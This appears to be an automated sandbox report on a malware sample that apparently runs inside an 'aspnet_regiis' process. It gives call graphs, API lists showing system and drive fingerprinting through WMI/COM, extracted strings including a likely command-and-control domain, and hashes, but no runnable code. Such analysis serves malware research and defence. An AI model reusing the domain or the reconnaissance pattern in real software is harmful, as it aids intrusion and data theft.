14654 759d40 14652->14654 14658 759e53 14654->14658 14680 75e0a0 14654->14680 14687 75e110 LdrInitializeThunk 14654->14687 14656 75a25b 14657 75c570 RtlFreeHeap 14656->14657 14659 75a274 14657->14659 14658->14656 14660 75c830 LdrInitializeThunk 14658->14660 14659->14648 14663 759e9a 14660->14663 14661 75c990 LdrInitializeThunk 14661->14656 14662 75e0a0 2 API calls 14662->14663 14663->14662 14664 75e110 LdrInitializeThunk 14663->14664 14665 75c570 RtlFreeHeap 14663->14665 14666 75a281 14663->14666 14668 75a25f 14663->14668 14664->14663 14665->14663 14667 75c570 RtlFreeHeap 14666->14667 14667->14668 14668->14661 14669->14622 14671 7355f1 14670->14671 14672 75ca5a 14670->14672 14671->14624 14671->14625 14671->14627 14671->14628 14671->14629 14671->14637 14671->14647 14671->14649 14672->14671 14675 75cae2 14672->14675 14688 75e110 LdrInitializeThunk 14672->14688 14673 75cc4e 14673->14671 14673->14673 14690 75e110 LdrInitializeThunk 14673->14690 14675->14673 14689 75e110 LdrInitializeThunk 14675->14689 14678->14623 14679->14628 14681 75e0c0 14680->14681 14682 75e0f3 14680->14682 14683 75e0d4 14680->14683 14686 75e0e8 14680->14686 14681->14682 14681->14683 14684 75c570 RtlFreeHeap 14682->14684 14685 75e0d9 RtlReAllocateHeap 14683->14685 14684->14686 14685->14686 14686->14654 14687->14654 14688->14675 14689->14673 14690->14671 14691->14579 14692->14577 14693->14582 14694->14581 14695->14587 14696->14599 14697->14594 14698->14596 14699->14605 14700 75e760 14701 75e780 14700->14701 14702 75e7be 14701->14702 14704 75e110 LdrInitializeThunk 14701->14704 14704->14702 14705 75c5a0 14706 75c5d0 14705->14706 14709 75c62e 14706->14709 14713 75e110 LdrInitializeThunk 14706->14713 14707 75c801 14709->14707 14712 75c749 14709->14712 14714 75e110 LdrInitializeThunk 14709->14714 14710 75c570 RtlFreeHeap 14710->14707 14712->14710 14713->14709 14714->14712 14715 758ea0 14716 758ec5 14715->14716 14719 758fc9 14716->14719 14724 75e110 LdrInitializeThunk 14716->14724 14718 759210 14719->14718 14721 7590e1 14719->14721 14723 75e110 LdrInitializeThunk 14719->14723 14721->14718 14725 75e110 LdrInitializeThunk 14721->14725 14723->14719 14724->14716 14725->14721 14726 760d20 14727 760d2f 14726->14727 14730 760e98 14727->14730 14734 75e110 LdrInitializeThunk 14727->14734 14729 75c570 RtlFreeHeap 14731 76114b 14729->14731 14730->14731 14733 76108e 14730->14733 14735 75e110 LdrInitializeThunk 14730->14735 14733->14729 14734->14730 14735->14733 14736 72a369 14737 72a430 14736->14737 14737->14737 14740 72b100 14737->14740 14739 72a479 14743 72b190 14740->14743 14741 72b1b5 14741->14739 14742 75e0a0 2 API calls 14742->14743 14743->14741 14743->14742 14744 75ea29 14745 75ea50 14744->14745 14745->14745 14746 75ea8e 14745->14746 14751 75e110 LdrInitializeThunk 14745->14751 14750 75e110 LdrInitializeThunk 14746->14750 14749 75eb59 14750->14749 14751->14746 14752 75e3a9 14753 75e3b2 GetForegroundWindow 14752->14753 14754 75e3c9 14753->14754 14755 750b2b CoSetProxyBlanket 14757 74c9eb 14759 74c8e2 14757->14759 14758 74cab5 14759->14758 14761 75e110 LdrInitializeThunk 14759->14761 14761->14759 14762 72ef53 CoInitializeEx CoInitializeEx 14763 74d893 14764 74d896 FreeLibrary 14763->14764 14765 74dbc9 14764->14765 14765->14765 14766 74dc30 GetComputerNameExA 14765->14766 14772 729d1e 14773 729d40 LoadLibraryExW 14772->14773 14775 729da5 14773->14775 14776 729e74 LoadLibraryExW 14775->14776 14777 729e85 14776->14777 14778 75c55b RtlAllocateHeap 14779 728600 14781 72860f 14779->14781 14780 728a48 ExitProcess 14781->14780 14782 728624 GetCurrentProcessId GetCurrentThreadId 14781->14782 14785 728a31 14781->14785 14783 728650 SHGetSpecialFolderPathW 14782->14783 14784 72864c 14782->14784 14787 728880 14783->14787 14784->14783 14794 75e080 14785->14794 14788 728964 GetForegroundWindow 14787->14788 14789 728982 14788->14789 14789->14785 14791 72b7b0 FreeLibrary 14789->14791 14792 72b7cc 14791->14792 14793 72b7d1 FreeLibrary 14792->14793 14793->14785 14797 75f970 14794->14797 14796 75e085 FreeLibrary 14796->14780 14798 75f979 14797->14798 14798->14796 14799 72e687 14800 72e6a0 14799->14800 14805 759280 14800->14805 14802 72e77a 14803 759280 11 API calls 14802->14803 14804 72e908 14803->14804 14804->14804 14806 7592b0 CoCreateInstance 14805->14806 14808 7594e4 SysAllocString 14806->14808 14809 759906 14806->14809 14812 759574 14808->14812 14810 759916 GetVolumeInformationW 14809->14810 14820 759934 14810->14820 14813 7598f5 SysFreeString 14812->14813 14814 75957c CoSetProxyBlanket 14812->14814 14813->14809 14815 75959c SysAllocString 14814->14815 14816 7598eb 14814->14816 14818 7596a0 14815->14818 14816->14813 14818->14818 14819 759701 SysAllocString 14818->14819 14823 759728 14819->14823 14820->14802 14821 7598d6 SysFreeString SysFreeString 14821->14816 14822 7598cc 14822->14821 14823->14821 14823->14822 14824 75976f VariantInit 14823->14824 14825 7597c0 14824->14825 14826 7598bb VariantClear 14825->14826 14826->14822 14827 75eb88 14828 75eba0 14827->14828 14831 75ebde 14828->14831 14834 75e110 LdrInitializeThunk 14828->14834 14829 75ec4e 14831->14829 14833 75e110 LdrInitializeThunk 14831->14833 14833->14829 14834->14831 14835 74d34a 14836 74d370 14835->14836 14836->14836 14837 74d3ea GetPhysicallyInstalledSystemMemory 14836->14837 14838 74d410 14837->14838 14838->14838

                                                                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                                                                              Function 00742E6D Relevance: 50.5, APIs: 3, Strings: 25, Instructions: 1504COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: "7t$%"$+A#C=]=_$- $f$8]pY$9#'$=]=_$CNF8$Fm$I$JOSP$Q*RG$R03!$V]$].n^$_^]\$_^]\$eN$g}zh$lev-tolstoi.com$p7t$s$wdnf$~SS}$rp
                                                                                                                                                                                                                                              • API String ID: 0-4093609724
                                                                                                                                                                                                                                              • Opcode ID: f31c448eb4fe0e9d3ef91d4e9c040e310fd7184f9ea5414d87c4b6ef60433545
                                                                                                                                                                                                                                              • Instruction ID: 9af55455f426ca3eb6c4f93e1716201f8ca0fa7499d2f799f1fe0f67d34b89e5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f31c448eb4fe0e9d3ef91d4e9c040e310fd7184f9ea5414d87c4b6ef60433545
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8AB225B1A08311CFD714CF28D8917ABBBE2FF85314F19856CE49A9B391D7789901CB91
                                                                                                                                                                                                                                              Function 00759280 Relevance: 33.9, APIs: 11, Strings: 8, Instructions: 653memorycomCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 204 759280-7592a4 205 7592b0-7592d7 204->205 205->205 206 7592d9-7592ef 205->206 207 7592f0-759322 206->207 207->207 208 759324-75936a 207->208 209 759370-75938c 208->209 209->209 210 75938e-7593a7 209->210 212 7593ad-7593b6 210->212 213 75942a-759435 210->213 214 7593c0-7593d9 212->214 215 759440-75947b 213->215 214->214 216 7593db-7593ee 214->216 215->215 217 75947d-7594de CoCreateInstance 215->217 218 7593f0-75941e 216->218 219 7594e4-759515 217->219 220 759906-759932 call 75fe00 GetVolumeInformationW 217->220 218->218 222 759420-759425 218->222 223 759520-75954d 219->223 226 759934-759938 220->226 227 75993c-75993e 220->227 222->213 223->223 225 75954f-759576 SysAllocString 223->225 230 7598f5-759902 SysFreeString 225->230 231 75957c-759596 CoSetProxyBlanket 225->231 226->227 228 759950-759957 227->228 232 759970-75998f 228->232 233 759959-759960 228->233 230->220 234 75959c-7595b4 231->234 235 7598eb-7598f1 231->235 237 759990-7599b2 232->237 233->232 236 759962-75996e 233->236 238 7595c0-75961e 234->238 235->230 236->232 237->237 239 7599b4-7599ca 237->239 238->238 240 759620-75969f SysAllocString 238->240 241 7599d0-759a06 239->241 242 7596a0-7596ff 240->242 241->241 243 759a08-759a2e call 73e960 241->243 242->242 244 759701-75972d SysAllocString 242->244 247 759a30-759a37 243->247 250 7598d6-7598e7 SysFreeString * 2 244->250 251 759733-759755 244->251 247->247 249 759a39-759a4c 247->249 252 759940-75994a 249->252 253 759a52-759a65 call 727fd0 249->253 250->235 258 7598cc-7598d2 251->258 259 75975b-75975e 251->259 252->228 255 759a6a-759a71 252->255 253->252 258->250 259->258 260 759764-759769 259->260 260->258 261 75976f-7597b7 VariantInit 260->261 262 7597c0-7597d4 261->262 262->262 263 7597d6-7597e0 262->263 264 7597e4-7597e6 263->264 265 7597ec-7597f2 264->265 266 7598bb-7598c8 VariantClear 264->266 265->266 267 7597f8-759806 265->267 266->258 268 75983d 267->268 269 759808-75980d 267->269 271 75983f-759877 call 727f50 call 728e10 268->271 270 75981c-759820 269->270 272 759810 270->272 273 759822-75982b 270->273 282 7598a7-7598b7 call 727f60 271->282 283 759879-75988f 271->283 275 759811-75981a 272->275 276 759832-759836 273->276 277 75982d-759830 273->277 275->270 275->271 276->275 280 759838-75983b 276->280 277->275 280->275 282->266 283->282 284 759891-75989e 283->284 284->282 286 7598a0-7598a3 284->286 286->282
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CoCreateInstance.OLE32(0076368C,00000000,00000001,0076367C,00000000), ref: 007594CF
                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(00001F7A), ref: 00759550
                                                                                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0075958E
                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(8DFD93FD), ref: 00759625
                                                                                                                                                                                                                                              • SysAllocString.OLEAUT32(4A105420), ref: 00759706
                                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 00759774
                                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 007598BC
                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32 ref: 007598DF
                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 007598E5
                                                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 007598F6
                                                                                                                                                                                                                                              • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 0075992E
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
                                                                                                                                                                                                                                              • String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
                                                                                                                                                                                                                                              • API String ID: 2573436264-1335595022
                                                                                                                                                                                                                                              • Opcode ID: ed79fd50b3388aaae2a7b13bff3d11354feb211db28a2ac1f30cc387d22096ad
                                                                                                                                                                                                                                              • Instruction ID: cba5e0853bd06c54a2cb4384677a3f40a87ebf3c6abc0aa8d7a6295bb0c3523e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed79fd50b3388aaae2a7b13bff3d11354feb211db28a2ac1f30cc387d22096ad
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60222676A083519BD310CF24C880B9BBBE2EFC5315F18892CFA9597391D7B9D945CB82
                                                                                                                                                                                                                                              Function 007357C0 Relevance: 29.7, APIs: 1, Strings: 15, Instructions: 1713COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
                                                                                                                                                                                                                                              • API String ID: 0-510280711
                                                                                                                                                                                                                                              • Opcode ID: 5d19576bcd517124df7ded3150a925184391655d591a9d05c152fc6523213cb0
                                                                                                                                                                                                                                              • Instruction ID: c83a7e81de91ce9110027e6719765f5c9d3ff1aac06e4446ac5be3bca19ef9a5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d19576bcd517124df7ded3150a925184391655d591a9d05c152fc6523213cb0
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B9C248B1608350DFD7248F28D8957ABB7E1FF95314F59893CE4DA8B292E7389801CB52
                                                                                                                                                                                                                                              Function 007439B9 Relevance: 18.3, APIs: 3, Strings: 7, Instructions: 821COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 854 7439b9-7439ce 855 743a06-743a14 854->855 856 743a37-743a51 854->856 857 743990-74399c 854->857 858 7439e0-7439e8 854->858 859 743a20 854->859 860 743a22-743a30 854->860 861 7439ef-7439ff 854->861 862 74374a-74375f 854->862 855->859 856->855 856->856 856->857 856->858 856->859 856->860 856->861 856->862 872 743a58-743a5f 856->872 857->854 858->855 858->856 858->857 858->858 858->859 858->860 858->861 858->862 860->856 860->858 860->862 861->855 861->856 861->858 861->859 861->860 861->862 863 7437b4-7437bc 862->863 864 7437c4-7437cc 862->864 865 743785-7437ad 862->865 866 7437e0-7437ef 862->866 867 743770-74377e 862->867 868 7437f2-7437f9 862->868 869 74392c-743940 862->869 870 743919-743925 862->870 871 74396a-743979 862->871 863->864 864->866 865->863 865->864 865->866 865->868 866->868 867->863 867->864 867->865 867->866 867->868 867->869 867->870 867->871 868->867 873 743800-743834 868->873 874 7438c0-7438c5 868->874 875 7438d0 868->875 876 743840-743842 868->876 877 74384e-74385b 868->877 869->871 869->872 878 743c85-743cbc call 727f50 RtlExpandEnvironmentStrings 869->878 879 743a77-743a8a 869->879 880 743950-743963 869->880 881 743980 869->881 882 743b50-743bd2 869->882 883 743ce2-743d2f call 727f50 869->883 884 743cc3 869->884 885 743a68-743a72 869->885 886 743cd8-743ce1 869->886 887 743ccb-743cd5 call 727f60 869->887 870->863 870->864 870->866 870->868 870->869 870->871 871->872 871->878 871->879 871->881 871->882 871->883 871->884 871->885 871->886 871->887 872->885 873->876 874->875 875->870 876->877 891 743860-74387a 877->891 878->883 878->884 878->886 878->887 911 743e0c-743eba call 727f50 878->911 912 743dfe-743e03 878->912 913 743f79 878->913 914 743f69-743f71 878->914 915 743f9a-744035 878->915 903 743406-743412 879->903 880->871 880->872 880->878 880->879 880->881 880->882 880->883 880->884 880->885 880->886 880->887 881->857 892 743be0-743c0c 882->892 916 743d30-743d83 883->916 884->887 885->903 887->886 891->891 899 74387c-743883 891->899 892->892 900 743c0e-743c4f RtlExpandEnvironmentStrings 892->900 899->867 904 743889-743898 899->904 905 743c50-743c73 900->905 909 7438a0-7438a7 904->909 905->905 910 743c75-743c7e 905->910 917 7438d2-7438d8 909->917 918 7438a9-7438ac 909->918 910->878 910->883 910->884 910->886 910->887 910->911 910->912 910->913 910->914 910->915 943 743ec0-743ee5 911->943 912->911 924 743f7f-743f8b call 727f60 913->924 914->913 920 744040-7440ce 915->920 916->916 919 743d85-743d8e 916->919 917->867 923 7438de-743912 call 75e110 917->923 918->909 922 7438ae 918->922 925 743d90-743d96 919->925 926 743db1-743dc5 919->926 920->920 927 7440d4-7440dd 920->927 922->867 923->863 923->864 923->865 923->866 923->868 923->869 923->870 923->871 944 743f94 924->944 931 743da0-743daf 925->931 932 743dc7-743dca 926->932 933 743de1-743dea call 7614b0 926->933 934 7440e0 call 741d00 927->934 931->926 931->931 938 743dd0-743ddf 932->938 942 743def-743df7 933->942 940 7440e5-7440ea 934->940 938->933 938->938 945 7440f3-74410f 940->945 942->911 942->912 942->913 942->914 942->915 942->924 942->945 943->943 946 743ee7-743ef0 943->946 944->915 947 744110-74415b 945->947 948 743f11-743f1f 946->948 949 743ef2-743efa 946->949 947->947 953 74415d-7441ce 947->953 951 743f41-743f62 GetLogicalDrives call 7614b0 948->951 952 743f21-743f24 948->952 950 743f00-743f0f 949->950 950->948 950->950 951->886 951->887 951->913 951->914 951->924 951->944 951->945 959 7442a7 951->959 960 7442ad-7442b9 call 727f60 951->960 954 743f30-743f3f 952->954 956 7441d0-74427b 953->956 954->951 954->954 956->956 958 744281-74429e call 741b60 956->958 958->959 959->960
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: ":t$+A#C=]=_$=]=_$_^]\$eN$p7t$rp
                                                                                                                                                                                                                                              • API String ID: 0-1551846742
                                                                                                                                                                                                                                              • Opcode ID: b369ce7e0940ecf50619161834e8b2f4c2e832bd7256fd4fa4f26ddd45bbe622
                                                                                                                                                                                                                                              • Instruction ID: 4f69a35749ae385a665242d39d02e6a1d9d62c7081d03ebae5d0438a442ec85f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b369ce7e0940ecf50619161834e8b2f4c2e832bd7256fd4fa4f26ddd45bbe622
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C4216B5A04311CFD718CF68D8916AABBB2FF89310F19C2ACD4469B395D778D942CB90
                                                                                                                                                                                                                                              Function 00731227 Relevance: 16.5, APIs: 1, Strings: 8, Instructions: 750COMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 965 731227-73123f 966 731241-731244 965->966 967 731280-7312ae call 721870 966->967 968 731246-73127e 966->968 971 7312b0-7312b3 967->971 968->966 972 7312b5-7312fb 971->972 973 7312fd-731327 call 721870 971->973 972->971 976 73132b-73132f 973->976 977 731329-731364 call 734850 973->977 979 731d26 976->979 985 731366 977->985 986 731368-7313a9 call 727f50 call 72a8d0 977->986 980 732715 979->980 982 732717-732733 call 721f30 980->982 992 72f450-732744 982->992 993 72f457-72f487 call 721f40 982->993 985->986 997 7313ab-7313ae 986->997 1001 72f489-72f48c 993->1001 999 7313b0-7313f8 997->999 1000 7313fa-73141e call 721870 997->1000 999->997 1007 731420-731459 call 734850 1000->1007 1008 731486-7314b6 call 734850 1000->1008 1003 72f48e-72f4ca 1001->1003 1004 72f4cc-72f51a call 721e30 1001->1004 1003->1001 1012 72f51e-72f522 1004->1012 1013 72f51c-72f545 1004->1013 1020 73145b 1007->1020 1021 73145d-731481 call 727f50 call 72a8d0 1007->1021 1018 7314ba-73155f call 727f50 call 72a8d0 RtlExpandEnvironmentStrings 1008->1018 1019 7314b8 1008->1019 1012->982 1017 72f549-72f54c 1013->1017 1022 72f54e-72f5ab 1017->1022 1023 72f5ad-72f5fe call 721970 1017->1023 1034 731562-731565 1018->1034 1019->1018 1020->1021 1021->1008 1022->1017 1023->980 1032 72f604 1023->1032 1032->980 1035 73156b-7315fa 1034->1035 1036 7315ff-731615 1034->1036 1035->1034 1037 731617-731628 call 727f60 1036->1037 1038 73162d-731646 1036->1038 1037->979 1039 73164a-7316ac call 727f50 1038->1039 1040 731648 1038->1040 1047 7316db-731704 call 727f60 1039->1047 1048 7316ae-7316d6 call 727f60 * 2 1039->1048 1040->1039 1055 731706-731709 1047->1055 1070 731d24 1048->1070 1057 73170b-73173d 1055->1057 1058 73173f-73175a call 721870 1055->1058 1057->1055 1065 7317b6-7317d7 1058->1065 1066 73175c-731788 call 734850 1058->1066 1068 7317da-7317dd 1065->1068 1075 73178a 1066->1075 1076 73178c-7317b4 call 727f50 call 72a8d0 1066->1076 1071 731818-73185e call 721b80 1068->1071 1072 7317df-731816 1068->1072 1070->979 1080 731860-731863 1071->1080 1072->1068 1075->1076 1076->1065 1082 731865-7318b6 1080->1082 1083 7318b8-7318e5 call 721a80 1080->1083 1082->1080 1087 7318e7 1083->1087 1088 7318ec-731930 call 721f30 1083->1088 1089 731bf1-731c75 call 728b60 call 7357c0 1087->1089 1093 731932 1088->1093 1094 731934-73194d call 727f50 1088->1094 1099 731c7a-731c89 call 729780 1089->1099 1093->1094 1100 73196f-731975 1094->1100 1101 73194f-731956 1094->1101 1109 731cc7-731cfa call 727f60 * 2 1099->1109 1110 731c8b-731c9a 1099->1110 1104 731977-731979 1100->1104 1103 731958-731964 call 734980 1101->1103 1119 731966-73196d 1103->1119 1107 731984-7319c4 call 721f40 1104->1107 1108 73197b-73197f 1104->1108 1121 7319c6-7319c9 1107->1121 1108->1089 1140 731d04-731d0e 1109->1140 1141 731cfc-731cff call 727f60 1109->1141 1112 731cb5-731cc5 call 727f60 1110->1112 1113 731c9c 1110->1113 1112->1109 1117 731c9e-731caf call 734b10 1113->1117 1129 731cb3 1117->1129 1130 731cb1 1117->1130 1119->1100 1125 7319cb-731a0c 1121->1125 1126 731a0e-731a55 call 721870 1121->1126 1125->1121 1136 731a57-731a5a 1126->1136 1129->1112 1130->1117 1138 731a79-731ac8 call 721870 1136->1138 1139 731a5c-731a77 1136->1139 1149 731aca-731acd 1138->1149 1139->1136 1144 731d10-731d13 call 727f60 1140->1144 1145 731d18-731d1f call 728c40 1140->1145 1141->1140 1144->1145 1145->1070 1150 731af6-731b48 call 721b80 1149->1150 1151 731acf-731af4 1149->1151 1154 731b4a-731b4d 1150->1154 1151->1149 1155 731b4f-731b7a 1154->1155 1156 731b7c-731bec call 721b80 call 7349a0 1154->1156 1155->1154 1156->1104
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_720000_aspnet_regiis.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID: )$+$>$@$F$L$[$`
                                                                                                                                                                                                                                              • API String ID: 0-4163809010
                                                                                                                                                                                                                                              • Opcode ID: e25e23813288d8cced58a27095851c3eeeb31bf1d7099d7c09e10be87b42a0d9
                                                                                                                                                                                                                                              • Instruction ID: fb99c8f8fb3ea83f1730e638e1123c0c0cbab8f99a86cd9cad2e40fe1f90ef0c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e25e23813288d8cced58a27095851c3eeeb31bf1d7099d7c09e10be87b42a0d9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8F52A17260C7908BD324DB38C5953AFBBE1AB95320F598A2DE4D9C7382D6788941CB43
                                                                                                                                                                                                                                              Function 00728600 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 351threadCOMMON
                                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 1219 728600-728611 call 75d9a0 1222 728617-72861e call 7562a0 1219->1222 1223 728a48-728a4a ExitProcess 1219->1223 1226 728a31-728a38 1222->1226 1227 728624-72864a GetCurrentProcessId GetCurrentThreadId 1222->1227 1230 728a43 call 75e080 1226->1230 1231 728a3a-728a40 call 727f60 1226->1231 1228 728650-72887f SHGetSpecialFolderPathW 1227->1228 1229 72864c-72864e 1227->1229 1233 728880-7288ce 1228->1233 1229->1228 1230->1223 1231->1230 1233->1233 1236 7288d0-72891d call 75c540 1233->1236 1239 728920-728943 1236->1239 1240 728964-72897c GetForegroundWindow 1239->1240 1241 728945-728962 1239->1241 1242 728982-728a0b 1240->1242 1243 728a0d-728a25 call 729d00 1240->1243 1241->1239 1242->1243 1243->1226 1246 728a27 call 72cb90 1243->1246 1248 728a2c call 72b7b0 1246->1248 1248->1226
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00728624
                                                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0072862E
                                                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 007287FA
                                                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 00728974
                                                                                                                                                                                                                                                • Part of subcall function 0072B7B0: FreeLibrary.KERNEL32(00728A31), ref: 0072B7B6
                                                                                                                                                                                                                                                • Part of subcall function 0072B7B0: FreeLibrary.KERNEL32 ref: 0072B7D7
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00728A4A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000002.00000002.1892342569.0000000000721000.00000020.00000400.00020000.00000000.sdmp, Offset: 00720000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892184795.0000000000720000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892502749.0000000000762000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1892881210.0000000000765000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000002.00000002.1893078830.0000000000773000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
